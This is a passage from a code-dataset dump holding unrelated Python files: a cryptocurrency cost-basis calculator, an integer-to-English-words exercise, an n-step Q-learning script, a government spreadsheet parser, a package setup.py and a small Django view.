one with sales and one with buys\r\n\r\n Buy = \"\"\r\n Sell = \"\"\r\n BuyCnt = 0\r\n SellCnt = 0\r\n with open('work.tmp', newline='') as f1:\r\n reader = csv.reader(f1)\r\n for line in reader:\r\n a1 = line[1]\r\n if a1[0] == '-':\r\n SellCnt += 1\r\n Sell = Sell + str(SellCnt) + ',' + line[0] + ',' + line[1] + ',' + line[2] + '\\n'\r\n else:\r\n BuyCnt += 1\t\t\r\n Buy = Buy + str(BuyCnt) + ',' + line[0] + ',' + line[1] + ',' + line[2] + '\\n'\t\r\n\r\n# sort the Buy and Sell strings into descending order by index numbers\r\n# assume the datafile is in chronologic order and you want to use FIFO accounting\r\n# the data would be rearanged from a chronologic order\r\n\r\n sortflag = 1\r\n while sortflag > 0:\r\n sortflag = 0\r\n cnt = 0\r\n d1 = \"\"\r\n c1 = \"\"\r\n Temp = \"\"\r\n lastflag=0\r\n passNum = 0\r\n for c in range(len(Buy)):\r\n a1 = Buy[c]\r\n if a1 == '\\n':\r\n d1 = d1 + a1\r\n cnt = 0\r\n passNum += 1\r\n if passNum == 1:\r\n c2 = c1\r\n d2 = d1\r\n if passNum > 1:\t\t\r\n c3 = c1\t\t\t\r\n d3 = d1\r\n A = int(c2)\t\t\t\t\r\n B = int(c3)\t\t\r\n if (A > B):\r\n Temp = Temp + c2 + d2\r\n c2 = c3\r\n d2 = d3\r\n lastflag=1\r\n if (A < B):\r\n Temp = Temp + c3 + d3\t\r\n sortflag = 1\t\t\t\t\t\r\n lastflag=2\r\n \t\t\t\r\n d1 = \"\"\r\n c1 = \"\"\t\t\t\r\n continue\t\t \r\n if a1 == ',':\r\n cnt = cnt + 1\r\n if cnt == 0:\r\n c1 = c1 + a1\r\n if cnt > 0:\r\n d1 = d1 + a1\r\n if lastflag == 1:\r\n Temp = Temp + c3 + d3 \t\r\n if lastflag == 2:\r\n Temp = Temp + c2 + d2\t\t\r\n Buy = Temp \t\r\n\t\r\n# filter out the index numbers before writing the new work file\r\n with open('work.tmp','w') as f2:\r\n Temp = \"\"\r\n for c in range(len(Buy)):\r\n a1 = Buy[c]\r\n if a1 == '\\n':\r\n d1 = d1 + a1\r\n Temp = Temp + d1\r\n d1 = \"\"\r\n cnt = 0\r\n if ((a1 == ',') and (cnt == 0)):\r\n cnt += 1\r\n continue\r\n if cnt > 0:\r\n d1 = d1 + a1\r\n f2.write(Temp)\r\n\r\n sortflag = 1\r\n while sortflag > 0:\r\n sortflag = 0\r\n cnt = 0\r\n d1 = \"\"\r\n c1 = \"\"\r\n Temp = \"\"\r\n lastflag=0\r\n passNum = 0\r\n for c in range(len(Sell)):\r\n a1 = Sell[c]\r\n if a1 == '\\n':\r\n d1 = d1 + a1\r\n cnt = 0\r\n passNum += 1\r\n if passNum == 1:\r\n c2 = c1\r\n d2 = d1\r\n if passNum > 1:\t\t\r\n c3 = c1\t\t\t\r\n d3 = d1\r\n A = int(c2)\t\t\t\t\r\n B = int(c3)\t\t\r\n if (A > B):\r\n Temp = Temp + c2 + d2\r\n c2 = c3\r\n d2 = d3\r\n lastflag=1\r\n if (A < B):\r\n Temp = Temp + c3 + d3\r\n sortflag = 1\t\t\t\t\t\r\n lastflag=2\r\n \t\t\t\r\n d1 = \"\"\r\n c1 = \"\"\t\t\t\r\n continue\t\t \r\n if a1 == ',':\r\n cnt = cnt + 1\r\n if cnt == 0:\r\n c1 = c1 + a1\r\n if cnt > 0:\r\n d1 = d1 + a1\r\n if lastflag == 1:\r\n Temp = Temp + c3 + d3 \t\r\n if lastflag == 2:\r\n Temp = Temp + c2 + d2\t\t\r\n Sell = Temp \t\r\n\r\n# filter out the index numbers before writing the new work file\r\n with open('work.tmp','a') as f2:\r\n Temp = \"\"\r\n for c in range(len(Sell)):\r\n a1 = Sell[c]\r\n if a1 == '\\n':\r\n d1 = d1 + a1\r\n Temp = Temp + d1\r\n d1 = \"\"\r\n cnt = 0\r\n if ((a1 == ',') and (cnt == 0)):\r\n cnt += 1\r\n continue\r\n if cnt > 0:\r\n d1 = d1 + a1\r\n f2.write(Temp)\r\n\r\n\t\r\n\t\r\n\t\r\nprint(\"\\n\\nBasis-Profit Calculator\")\r\nprint(\"Ed Jordan, 14 Feb 2018\")\r\n\r\nsortFlag = \"\"\r\na = \"\"\r\na2 = \"\"\r\nb = len(sys.argv)\r\nif b > 1:\r\n for c in range(b): \r\n a2 = sys.argv[c]\r\n print(a2)\r\n if a2[0] != '-':\r\n a = a2\r\n\t\t\t\r\n if ((a2 == '-h') or (a2 == '--help') or (a2 == '-H')):\r\n print(\"Data should have one line of buys before the first sale. 
It can have a line of headers at the top.\")\n        print(\"Data file needs 3 columns. These are separated by commas or tabs.\")\n        print(\"Program uses last-in to first-out, LIFO, basis accounting\\n\")\n        print(\"Data should be in chronological order with buys first before sales.\")\n        print(\"An 'index out of range' error is probably related to the data file format. \")\n        print(\"Parameters:\\n -h or --help: help\\n first parameter: datafile name\\nFirstIn-FirstOut: -F\")\n        print(\"python B2018.py datafile.txt -F\")\n        print(\"See the README file.\")\n        sys.exit(1)\n\n        if ((a2 == '-F') or (a2 == '-f')):\n            sortFlag = \"F\"\n\t\t\t\nif a != '': \n    dfile = ''\n    for s in range(0,len(a)):\n        if a[s] == '.':\n            break\n        dfile = dfile + a[s]\n\n    datafile = dfile + '.txt'\n    writefile = dfile + '.csv'\n    print(datafile)\n\nwith open(datafile,'r') as f1:\n    with open('work.tmp','w') as f2:\n        for line in f1:\n            msg = \"\"\n            flag = 0\n            for s in range(0,len(line)):\n                a = line[s]\n                if line[0] == '\\n':\n                    break \n                if a == chr(9):\n                    a = ','\n                    msg = msg + a\n                elif ((a == ',') and (flag == 1)):\n                    continue\n                elif a == '$':\n                    flag = 1\n                    continue\n                elif a == ' ':\n                    continue\n                else:\n                    msg = msg + a\n            \n            f2.write(msg) \n\n\t\nif sortFlag == 'F':\n    print(\"Option -F\")\n    SortData() \n\n\ndef GetDecimal(n3): # each piece of data should have the correct number of decimals\n    cnt = 0\n    for s in range(0,len(n3)):\n        a = n3[s]\n        cnt = cnt + 1\n        if a == '.':\n            cnt = 0\n    \n    return cnt\n\t\n\t\ndef AdjFlag(n1,n2,Prec):\n    flag=0\t\t\n \n# 3 outcomes for addition of sold coins with bought coins\n# negative - more sold than bought\n# positive - fewer sold than bought\n# zero - equal number sold and bought; flag = 1, 2, or 0\n\n    a = \"0.\"\n    for s in range(0,Prec):\n        a = a + \"0\"\n\t\t\n    a = a + \"5\"\n    a = Decimal(a)\t\n    pr1 = float(n1)\n    pr2 = float(n2) \n\t\n    if pr1 < a: # decimal point + 1 ?\n        pr1 = 0\n    if pr2 < a:\n        pr2 = 0\n    \n    pr3 = pr1 - pr2\n\n    if pr3 == 0:\n        flag = 0\n    if pr3 > 0:\n        flag = 2\n    if pr3 < 0:\n        flag = 1\n\n# if the flag is zero. 
The amounts of the coins are equal\r\n# the price of the bought coins == the basis of the sold coins\r\n# both the bought coin row and the sold coin row can be deleted\r\n# from the data file\r\n\r\n return flag\r\n\r\ndef findRecordIndex():\r\n inx = 1\t\t\t\t\t# starting record\r\n try:\r\n with open('work.tmp', newline='') as f1:\r\n reader = csv.reader(f1)\r\n cnt = 0\r\n for line in reader:\r\n cnt=cnt+1\r\n n1 = line[1]\r\n if n1[0] == '-':\r\n inx = cnt\r\n break\r\n f1.close\r\n inx = inx -1\r\n except IndexError:\r\n inx = 0\r\n return inx\r\n\r\ndef findListA(inx):\r\n dataLista = \"\"\r\n f1 = open('work.tmp', 'r')\r\n cnt = 1\r\n c1 = \"\"\r\n for line in f1: \r\n c1 = c1 + str(line) \r\n cnt = cnt + 1 \r\n if cnt == inx:\r\n f1.close\r\n break\r\n \r\n dataLista = c1\r\n return dataLista\r\n\r\ndef findListB(inx):\r\n dataListb =\"\"\r\n inx = inx +2\r\n f1 = open('work.tmp', 'r')\r\n cnt = 0\r\n c1 = \"\"\r\n for line in f1:\r\n cnt = cnt +1 \r\n if cnt >= inx:\r\n c1 = c1 + str(line) \r\n \r\n f1.close\r\n dataListb = c1\r\n return dataListb\r\n\r\ndef saveData(html):\r\n csv.register_dialect('escaped', delimiter = ' ', escapechar=\"\\\\\", quoting=csv.QUOTE_NONE)\r\n with open(writefile, 'a', newline='') as f1:\r\n linewriter = csv.writer(f1, dialect='escaped')\r\n linewriter.writerow(html)\r\n f1.close\r\n return\r\n\r\ndef writeData(dataLista, html, dataListb):\r\n f1 = open('work.tmp','w')\r\n f1.write(dataLista)\r\n f1.write(html)\r\n f1.write(dataListb)\r\n f1.close\r\n return\r\n\r\ndef makePositive(x): # string x is returned positive\r\n c = x\r\n a = \"\"\r\n for b in range(len(c)):\r\n if c[b] != '-':\r\n a = a + c[b]\r\n return a\r\n\r\ndef adjLength(x,y): # limit string to 2 decimal digits for currency.\r\n # y is the number of digits after the decimal point\r\n cnt=0\r\n a = \"\"\r\n e = \"\"\r\n c = \"\"\r\n d = 0\r\n flag = 0 # flag for the decimal point\r\n flag2 = 0 # flag for a leading zero in e\r\n for b in range(len(x)):\r\n f = x[b]\r\n if flag == 1:\r\n cnt = cnt + 1\r\n if cnt > y:\r\n d = int(f)\r\n break\r\n e = e+f\r\n if f == '.':\r\n flag = 1\r\n if flag == 0:\r\n c = c + f\r\n\t\t\t\t\t\r\n if d > 4: \r\n flag=0\r\n cnt = 0\r\n\r\n for b in range(len(e)):\r\n if e[b] != \"0\":\r\n flag = 1\r\n if e[b] == \"0\":\r\n if flag == 0:\r\n flag2 = flag2+1 # count leading zeros\r\n else:\r\n cnt = cnt+1 # digits after leading 0\r\n\r\n# int drops all leading zeros\r\n# if e is all 9s - they become zeros and c is incremented\r\n# if e is all 0s - it becomes 1 and we drop one leading 0\r\n# if e after the leading zeros is all 9s we also drop 1 0\r\n\r\n pr = \"\"\r\n pr1= \"\"\r\n if cnt > 0:\r\n for b in range(cnt):\r\n pr = pr + \"9\"\r\n pr1 = pr1 + \"0\"\r\n \r\n pr = int(pr)\r\n e = int(e)\r\n \r\n if e == pr:\r\n if cnt < y:\r\n e = \"1\"+pr1\r\n flag2 = flag2 -1\r\n if cnt == y:\r\n e = pr1\r\n c = int(c)\r\n c = c + 1\r\n c = str(c)\r\n else:\r\n e = e + 1\r\n e = str(e)\r\n for b in range(flag2):\r\n e = '0'+e\r\n\r\n if cnt == 0:\r\n e = 1\r\n flag2 = flag2-1\r\n e = str(e)\r\n if flag2 > 0: # add leading zeros\r\n e = str(e)\r\n for b in range(flag2):\r\n e = \"0\"+e\r\n\r\n a = c +\".\"+e \r\n n = y - len(e)\r\n\t\r\n if n > 0:\r\n for b in range(n):\r\n a = a + \"0\"\t\t# add trailing zeros\r\n \r\n return a \r\n \r\ndef adjValue(x): # adj value of digital x and make string\r\n if x == 0:\r\n a = \"0.00\"\r\n else:\r\n a = str(x) \r\n\r\n return a \r\n\r\n# Save work.tmp first to the spreadsheet. 
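(an audit copy of the cleaned input) 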
This is followed by the program output\nmsg = \"\"\nsaveData(msg)\n\nwith open('work.tmp','r') as f1:\n    for line in f1:\n        msg = ''\n        for a in range(0,len(line)):\n            if line[a] != '\\n':\n                msg = msg + line[a]\n\n        saveData(msg) \n\t\n# write first row of the spreadsheet\nmsg = \"\"\nsaveData(msg)\nmsg = \"saleDate,number,cost,unitPrice,proceeds,buyDate,profit,gain\"\nsaveData(msg)\n\n# d1 is the date of the purchase\n# d2 is the date of the sale\n# gain is the long or short term nature of the sale\n# p1 is the price of the purchased coins\n# p2 is the price of the sale of coins and it is negative\n# p3 is the price per coin in dollars purchased\n# p4 is the price per coin in dollars sold\n# n1 is the number of coins bought\n# n2 is the number of coins sold.\n\n\ninx = 1\nwhile inx > 0:\n    \n    d1=\"\"\n    d2=\"\"\n    n1=\"\"\n    n2=\"\"\n    p1=\"\"\n    p2=\"\"\n    p3=\"\"\n    p4=\"\"\n\n    cnt2 = 0\n    flag = 0\n    dataListA = \"\"\n    dataListB = \"\"\n\n    inx = findRecordIndex() \n    if inx < 1:\n        break\n    \n    with open('work.tmp', newline='') as f1:\n        reader = csv.reader(f1)\n        cnt=0\n        \n        for line in reader:\n            cnt=cnt+1\n            if cnt == inx:\n                d1 = line[0]\n                n1 = line[1]\n                p1 = line[2]\n            if cnt == inx+1:\n                d2 = line[0]\n                n2 = line[1]\n                p2 = line[2]\n                break\n\t\t\n    Precision = GetDecimal(n1) # set decimal number based on data \n    p1 = makePositive(p1)\n    p2 = makePositive(p2) \n    n1 = makePositive(n1)\n    n2 = makePositive(n2)\n\t\n    yr1 = d1[0]+d1[1]+d1[2]+d1[3] \n    yr2 = d2[0]+d2[1]+d2[2]+d2[3] \n    if d1[4] == '0': # date fields are characters, so compare against '0'\n        mo1 = d1[5] \n    else:\n        mo1 = d1[4] + d1[5]\n    if d1[6] == '0':\n        da1 = d1[7]\n    else:\n        da1 = d1[6] + d1[7] \n    if d2[4] == '0':\n        mo2 = d2[5] \n    else:\n        mo2 = d2[4] + d2[5]\n    if d2[6] == '0':\n        da2 = d2[7]\n    else:\n        da2 = d2[6] + d2[7]\n\n    yr1 = int(yr1)\n    mo1 = int(mo1)\n    da1 = int(da1)\n    yr2 = int(yr2)\n    mo2 = int(mo2)\n    da2 = int(da2) \n\n    date1 = date(yr1,mo1,da1)\n    date2 = date(yr2,mo2,da2)\n    date3 = abs(date2-date1)\n    date3 = date3.days\n    if date3 > 365:\n        gain = \"L\"\n    else:\n        gain = \"S\"\n\n# the basis for the sale is the share of the coins purchased\n# is #sold/#bought x price of the whole purchase\t\n    \n    p1 = Decimal(p1) # cost of purchase\n    p2 = Decimal(p2) # proceeds of sale \n    n2 = Decimal(n2) # number sold\n    n1 = Decimal(n1) # number bought\n    p3 = Decimal(p1/n1) # price per coin bought\n    p4 = Decimal(p2/n2) # price per coin sold\n    p4 = float(p4)\n    p4 = Decimal(p4)\n    p3 = float(p3)\n    p3 = Decimal(p3)\n\t\n    basis = p3*n2 \n    profit = p2 - basis\n\t\n    basis = adjValue(basis)\n    basis = adjLength(basis,2)\n    basis = Decimal(basis)\n    profit = adjValue(profit)\n    profit = adjLength(profit,2)\n    profit = Decimal(profit)\n\t\t\n\t\t\n# the price obtained for the coins sold minus the basis = gain/loss p2 = proceeds of sale\n# remaining coins unsold are n1 - n2 \n# the price per coin purchased does not change. 
p3 and p4 don't change\r\n\r\n profit = adjValue(profit)\r\n profit = adjLength(profit,2)\r\n newNumCoins = n1-n2\r\n newBasis = newNumCoins*p3\r\n newBasis = adjValue(newBasis)\r\n newNumCoins = str(newNumCoins)\r\n basis = adjValue(basis)\r\n\r\n newBasis = adjLength(newBasis,2)\r\n\r\n profit = adjLength(profit,2)\r\n newNumCoins = adjLength(newNumCoins,Precision)\r\n \r\n flag = AdjFlag(n1,n2, Precision)\r\n \r\n dataListA = findListA(inx)\r\n dataListB = findListB(inx)\r\n\r\n if flag == 0: # equal number sold and bought\r\n n2 = str(n2)\r\n p3 = adjValue(p3)\r\n p3 = adjLength(p3,2)\r\n n2 = adjLength(n2,Precision)\r\n p1 = adjValue(p1)\r\n p2 = adjValue(p2)\r\n p1 = adjLength(p1,2)\r\n p2 = adjLength(p2,2)\r\n p4 = adjValue(p4)\r\n p4 = adjLength(p4,2)\r\n msg = d2+\",-\"+n2+\",\"+basis+\",\"\r\n msg = msg+p4+\",\"+p2+\",\"+d1+\",\"+profit+\",\"+gain\r\n\t\r\n saveData(msg)\r\n msg = '\\n'\r\n writeData(dataListA,msg,dataListB)\r\n\r\n if flag == 2: # fewer number sold than bought\r\n n2 = str(n2)\r\n profit = str(profit)\r\n n2 = adjLength(n2,Precision)\r\n p2 = adjValue(p2)\r\n p2 = adjLength(p2,2)\r\n p4 = adjValue(p4)\r\n p4 = adjLength(p4,2)\r\n msg = d2+\",-\"+n2+\",\"+basis+\",\"+p4+\",\"+p2+\",\"+d1+\",\"+profit+\",\"+gain\r\n\t\t\r\n saveData(msg)\r\n msg = d1+','+newNumCoins+','+newBasis+'\\n'\r\n\r\n writeData(dataListA,msg,dataListB)\r\n \r\n if flag == 1: # greater number sold than bought - carry some over unsold coins to the next sale\r\n # n1 becomes the number sold and the proceeds are n1*p4 for sale proceeds\r\n\t\t # p1 is the basis of the sold coins \r\n \r\n nn1 = n2 - n1\r\n newBasis = nn1*p4\r\n np2 = n1*p4\r\n nn1 = str(nn1)\r\n nn1 = makePositive(nn1)\r\n nn1 = adjLength(nn1,Precision)\r\n profit = np2-p1 \r\n np2 = adjValue(np2)\r\n np2 = adjLength(np2,2)\r\n p1 = adjValue(p1)\r\n p1 = adjLength(p1,2)\r\n n1 = str(n1) \r\n n1 = adjLength(n1,Precision) \r\n p2 = str(p2)\r\n p4 = adjValue(p4)\r\n p4 = adjLength(p4,2)\r\n profit=adjValue(profit)\r\n profit=adjLength(profit,2)\r\n newBasis = adjValue(newBasis)\r\n newBasis=adjLength(newBasis,2)\r\n msg = d2+\",-\"+n1+\",\"+p1+\",\"+p4+\",\"+np2+\",\"+d1+\",\"\r\n msg = msg +profit+\",\"+gain \r\n saveData(msg)\r\n \r\n msg = d2+',-'+nn1+',-'+newBasis+'\\n'\r\n writeData(dataListA,msg,dataListB)\r\n\t\t\r\n\r\n\t\t\r\n# add the work.tmp residual file to the spreadsheet\r\n# then delete the work.tmp file\r\nmsg = \"\"\r\nsaveData(msg)\r\nmsg = 'Residual,Unsold,Items'\r\nsaveData(msg)\r\n\r\nwith open('work.tmp','r') as f1:\r\n for line in f1:\r\n msg = ''\r\n for a in range(0,len(line)):\r\n if line[a] != '\\n':\r\n msg = msg + line[a]\r\n\r\n saveData(msg) \r\n \r\n\t\t\r\nos.remove('work.tmp')\r\n\r\nprint('done')\r\nsys.exit(0)\r\n","sub_path":"B2019b.py","file_name":"B2019b.py","file_ext":"py","file_size_in_byte":19054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"370501147","text":"\"\"\"\n1305. Integer to English Words\nConvert a non-negative integer to its english words representation. 
Given input is guaranteed to be less than 2^31 - 1.\n\nExamples\n123 -> \"One Hundred Twenty Three\"\n12345 -> \"Twelve Thousand Three Hundred Forty Five\"\n1234567 -> \"One Million Two Hundred Thirty Four Thousand Five Hundred Sixty Seven\"\n\"\"\"\nclass Solution:\n    \"\"\"\n    @param num: a non-negative integer\n    @return: English words representation\n    \"\"\"\n    def numberToWords(self, num):\n        # Write your code here\n        n1 = [\"\", \"One\", \"Two\", \"Three\", \"Four\", \"Five\",\n              \"Six\", \"Seven\", \"Eight\", \"Nine\", \"Ten\",\n              \"Eleven\", \"Twelve\", \"Thirteen\", \"Fourteen\", \"Fifteen\",\n              \"Sixteen\", \"Seventeen\", \"Eighteen\", \"Nineteen\"]\n        n2 = [\"\", \"Ten\", \"Twenty\", \"Thirty\", \"Forty\",\n              \"Fifty\", \"Sixty\", \"Seventy\", \"Eighty\", \"Ninety\"]\n        n3 = ['Hundred', '', 'Thousand', 'Million', 'Billion']\n        res = ''\n        index = 1\n        if num == 0:\n            return 'Zero'\n        elif 0 < num < 20:\n            return n1[num]\n        elif 20 <= num < 100:\n            return (n2[num // 10] + ' ' + n1[num % 10]).strip()  # was n1[num], which raises IndexError for num >= 20\n        else:\n            while num != '':\n                digit = int(str(num)[-3::])\n                num = (str(num)[:-3:])\n                i = len(str(digit))\n                r = ''\n                while True:\n                    if digit < 20:\n                        r += ' ' + n1[digit] + ' '\n                        break\n                    elif 20 <= digit < 100:\n                        r += ' ' + n2[digit // 10]\n                        digit = digit % 10  # drop the tens place so the loop can terminate\n                    elif 100 <= digit < 1000:\n                        r += ' ' + n1[digit // 100] + ' ' + n3[0]\n                        digit = digit % (10 ** (i - 1))\n                        i -= 1\n                r = r.strip()\n                if digit != 0 or i >= 1:\n                    r += ' '+n3[index]+' '\n                    index += 1\n                r += res\n                res = r\n            return res.strip()","sub_path":"算法 - 其他/字符串处理/1305.Integer to English Words.py","file_name":"1305.Integer to English Words.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"122304325","text":"import gym\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport mountain_car_q_learning\nfrom mountain_car_q_learning import plot_cost_to_go, StateTransformer, RBFLearnModel, plot_running_avg\n\n\n# the main difference from basic Q-learning is that we calculate G over multiple steps\nclass SGDRegressor:\n    def __init__(self, **kwargs):\n        self.weights = None\n        self.learning_rate = 0.01\n\n    # keep in mind that Y is G\n    def partial_fit(self, X, Y):\n        if self.weights is None:\n            dimensions = X.shape[1]\n            self.weights = np.random.randn(dimensions) / np.sqrt(dimensions)\n        self.weights += self.learning_rate * (Y - X.dot(self.weights)).dot(X)\n\n    def predict(self, X):\n        return X.dot(self.weights)\n\nmountain_car_q_learning.SGDRegressor = SGDRegressor\n\n# we have to keep the last n states, rewards and actions\ndef play_one(env, model, eps, gamma, n=5):\n    state = env.reset()\n    done = False\n    total_reward = 0\n    rewards = []\n    states = []\n    actions = []\n    # for each step we have to multiply by an additional gamma\n    n_gammas = np.array([gamma]*n) ** np.arange(n)\n\n    while not done:\n        action = model.next_action(state, eps)\n\n        states.append(state)\n        actions.append(action)\n\n        prev_state = state\n        state, reward, done, info = env.step(action)\n\n        rewards.append(reward)\n\n        # update model\n        if len(rewards) >= n:\n            previous_returns = n_gammas.dot(rewards[-n:])\n            G = previous_returns + (gamma **n)*np.max(model.predict(state)[0])\n            model.update(states[-n], actions[-n], G)\n\n        total_reward += reward\n\n        rewards = rewards[-n+1:]\n        states = states[-n+1:]\n        actions = actions[-n+1:]\n\n    # according to the documentation the goal is achieved if position > 0.5\n    win = state[0] >= 0.5\n    if win:\n        while len(rewards) > 0:\n            G = n_gammas[:len(rewards)].dot(rewards)\n            model.update(states[0], actions[0], G)\n            states.pop(0)\n
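            # Sketch (added, not in the source): each flushed tail return above is the plain
            # discounted sum G = sum_k gamma**k * r_k over the remaining rewards; e.g. for
            # n=3, gamma=0.99 and rewards [-1, -1, -1]:
            #   G = -1 - 0.99 - 0.99**2 = -2.9701
            # which is exactly what n_gammas[:len(rewards)].dot(rewards) computes.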
actions.pop(0)\n rewards.pop(0)\n else:\n # we lose, so it is a good idea to set negative reward\n while len(rewards) > 0:\n guess_rewards = rewards + [-1]*(n - len(rewards))\n G = n_gammas.dot(guess_rewards)\n model.update(states[0], actions[0], G)\n states.pop(0)\n actions.pop(0)\n rewards.pop(0)\n return total_reward\n\nif __name__ == '__main__':\n env = gym.make('MountainCar-v0')\n state_transformer = StateTransformer(env)\n model = RBFLearnModel(env, state_transformer, \"constant\")\n gamma = 0.99\n\n N_episodes = 300\n total_rewards = np.empty(N_episodes)\n for episode in range(N_episodes):\n eps = 0.1 * (0.97 ** episode)\n one_episode_reward = play_one(env, model, eps, gamma)\n total_rewards[episode] = one_episode_reward\n if (episode + 1) % 100 == 0:\n print(\"episode:\", episode, \"total reward:\", total_rewards)\n\n plt.plot(total_rewards)\n plt.title(\"Rewards\")\n plt.show()\n\n plot_running_avg(total_rewards)\n plot_cost_to_go(env, model)\n\n\n\n","sub_path":"olena_reinforsment_learning/n_step.py","file_name":"n_step.py","file_ext":"py","file_size_in_byte":3102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"404363","text":"\"\"\"\n\"\"\"\n\nfrom gluegov.lib.tables import XLSTable\nimport xlrd\n\ndef format(x):\n try:\n return str(int(x))\n except:\n return str(x)\n\ndef isNotEmpty(x):\n return x != \"\" and x != \" \"\n\nclass onsXLSTable(XLSTable):\n def parse(self):\n # open file and get the correct sheet\n b = xlrd.open_workbook(self.fileName)\n s = b.sheet_by_index(1)\n\n # get keys\n keylist1 = s.row_values(9)\n keylist2 = s.row_values(10)\n\n # map keylists to one keylist\n keylist = [e for e in map(lambda x, y: x+\" \"+format(y), keylist1, keylist2)]\n keylist = [e for e in filter(lambda x: isNotEmpty(x), keylist)]\n self.fields = keylist\n\n for x in range(13, 463):\n row = s.row_values(x)\n row = [e for e in filter(lambda x: isNotEmpty(x), row)]\n if row != []:\n rowDict = dict(zip(keylist, row))\n self.records.append(rowDict)\n\n\nonsXLSTable(\n \"ons\",\n \"population-and-household-estimates\",\n \"http://www.ons.gov.uk/ons/rel/census/2011-census/population-and-household-estimates-for-england-and-wales---unrounded-figures-for-the-data-published-16-july-2012/rft-1-2-ew-pp04.xls\",\n \"population-and-household-estimates.xls\"\n).parse()\n","sub_path":"server/gluegov/data/ons.py","file_name":"ons.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"293922700","text":"def countdown(number):\n if number >= 0:\n print(number)\n countdown(number - 1)\n\ndef countup(curr, max):\n if curr <= max:\n print(curr)\n countup(curr + 1, max)\n\ndef sil(n):\n if n == 1:\n return 1\n else:\n return n * sil(n - 1)\n\n\n#countdown(10)\n#countup(1, 2)\nnumb = 3\nprint(f\"{numb}! 
= {sil(numb)}\")","sub_path":"Rekurencja.py","file_name":"Rekurencja.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"533057326","text":"import re\nimport sys\nfrom os import path\nfrom setuptools import find_packages, setup\nfrom setuptools.command.test import test as TestCommand\n\n\nthis_directory = path.abspath(path.dirname(__file__))\nwith open(path.join(this_directory, 'PACKAGE_README.md')) as f:\n long_description = f.read()\n\n\nclass PyTest(TestCommand):\n user_options = [('pytest-args=', 'a', \"Arguments to pass to pytest\")]\n\n def initialize_options(self):\n TestCommand.initialize_options(self)\n self.pytest_args = ''\n\n def run_tests(self):\n import shlex\n # import here, cause outside the eggs aren't loaded\n import pytest\n errno = pytest.main(shlex.split(self.pytest_args))\n sys.exit(errno)\n\n\ntests_require = [\n 'pandas',\n 'pytest',\n 'requests_mock',\n 'mock', # needed for Python 2\n 'future', # needed for Python 2\n 'pylint',\n 'pylint2junit'\n]\n\nrelease_require = [\n 'zest.releaser[recommended]>=6.13.5,<6.14',\n 'readme-renderer>=24.0,<25.0',\n 'setuptools >= 38.6.0',\n 'wheel >= 0.31.0',\n 'twine >= 1.11.0',\n]\n\ndev_require = tests_require + [\n 'ipython',\n 'sphinx==1.8.3',\n 'sphinx_rtd_theme==0.1.9',\n 'nbsphinx>=0.2.9,<1',\n 'nbconvert>=5.3,<6',\n 'numpydoc>=0.8.0',\n]\n\n\nwith open('datarobotai/_version.py') as fd:\n version = re.search(r'^__version__\\s*=\\s*[\\'\"]([^\\'\"]*)[\\'\"]',\n fd.read(), re.MULTILINE).group(1)\n\nif not version:\n raise RuntimeError('Cannot find version information')\n\n\nsetup(name='datarobot-ai',\n version=version,\n description='Python Client for the DataRobot AI API',\n long_description_content_type=\"text/markdown\",\n long_description=long_description,\n url='https://github.com/datarobot/datarobot-ai-py',\n author='DataRobot, Inc',\n author_email='support@datarobot.com',\n license='Apache 2.0',\n packages=find_packages(),\n install_requires=[\n 'requests', 'requests_toolbelt', 'six', 'backports.csv'\n ],\n tests_require=tests_require,\n extras_require={\n 'dev': dev_require,\n 'release': release_require,\n 'recommended': ['pandas==0.24.2'],\n },\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Developers',\n 'Natural Language :: English',\n 'License :: OSI Approved :: Apache Software License',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Topic :: Scientific/Engineering',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n ],\n cmdclass={'test': PyTest},\n include_package_data=True,\n zip_safe=False)\n","sub_path":"pypi_install_script/datarobot-ai-1.0.6.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"370861894","text":"# header\nheader = {'Content-Type\t':'application/x-www-form-urlencoded'}\n# 文字识别api地址\ngeneral_url = 'https://aip.baidubce.com/rest/2.0/ocr/v1/general_basic'\n# 语种字典\nlanguage_dict = {'中英混合':'CHN_ENG',\n '英文':'ENG',\n '葡萄牙语':'POR',\n '法语':'FRE',\n '德语':'GER',\n '意大利语':'ITA',\n '西班牙语':'SPA',\n '俄语':'RUS',\n '日语':'JAP',\n '韩语':'KOR'\n 
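                 # Hypothetical usage sketch (not in this file; request fields assumed from
                 # Baidu's OCR docs -- 'token' and 'b64_image' are placeholders):
                 #   import requests
                 #   requests.post(general_url, headers=header,
                 #                 params={'access_token': token},
                 #                 data={'image': b64_image,
                 #                       'language_type': language_dict['英文']})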
}\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"61264607","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.views.generic import TemplateView # Import TemplateView\nfrom django.views.generic import ListView\nfrom django.views.generic import DetailView\nfrom django.shortcuts import get_object_or_404\nfrom main.models import Employees\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.models import User\nfrom django.views import generic\n# Create your views here.\n#def home(request):\n# return HttpResponse(\"Hello World!\")\n\n#def home(request):\n# return render(request, \"main/home.html\", {'message': 'hi, sumit'})\n\ndef homepage(request):\n# employees=User.objects.all()\n employees = Employees.objects.all()\n# emp = employees.filter(user_id=\"sumitka\")\n return render(request, 'home.html', context={'employees':employees},\n )\n\nclass UserList(ListView):\n model = Employees\n template_name = 'home.html'\n# def get_context_data(self, **kwargs):\n# # Call the 